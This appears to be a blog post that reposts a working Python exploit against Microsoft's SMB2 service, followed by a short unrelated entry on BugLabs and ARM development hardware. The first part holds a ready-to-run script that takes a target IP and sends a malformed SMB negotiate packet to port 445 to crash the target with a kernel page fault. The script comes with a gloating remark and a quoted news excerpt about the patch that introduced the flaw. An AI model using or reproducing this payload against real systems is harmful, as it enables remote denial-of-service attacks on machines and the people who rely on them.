# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
#moded by knife to pass command line arg for IP.. wuttup priv
import sys
from socket import socket
from time import sleep
if (len(sys.argv) >= 2):
host = sys.argv[1], 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be
# "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
else:
sys.exit("Specify an IP.")
EOF
HAHA supposedly Microsoft opened this gaping security hole in SMB2 in a patch released in 2007 to fix a different, and less critical vulnerability.
From securityFocus
"Laurent GaffiƩ -- the researcher that disclosed a critical flaw in Microsoft's Server Message Block (SMB) version 2 code earlier this week -- said that further research pinpointed the specific patch that added the vulnerability to Windows Vista. The patch, which fixed a remote execution flaw in SMBv2 signing, was rated Important by Microsoft because the vulnerable feature was not turned on by default. The vulnerability that the patch allegedly introduced could allow an attacker to exploit an affected system in its default configuration, which usually merits a Critical rating from Microsoft."
+++
today a link to http://buglabs.net was posted in our channel. It looks slick and easy to use, and uses an ARM microprocessor. ALL great things, but is it worth it? As a more knowledgable comrad suggested... could you not just buy an ARM development kit such as this one. And if a programmable touchscreen with simple audio in/outs and Linux is all you are after... why not a google development phone? The first android development editions came out late last year, and there is already much support and code. I currently play with the Arduino chip with a shitty ATmega microcontroller, so i am in the market for something of this nature. A lot to consider, but the BugLabs just seems to be gimmicky :( it reminds me of MAC. heh
MORE TO COME ON THIS TOPIC!
No comments:
Post a Comment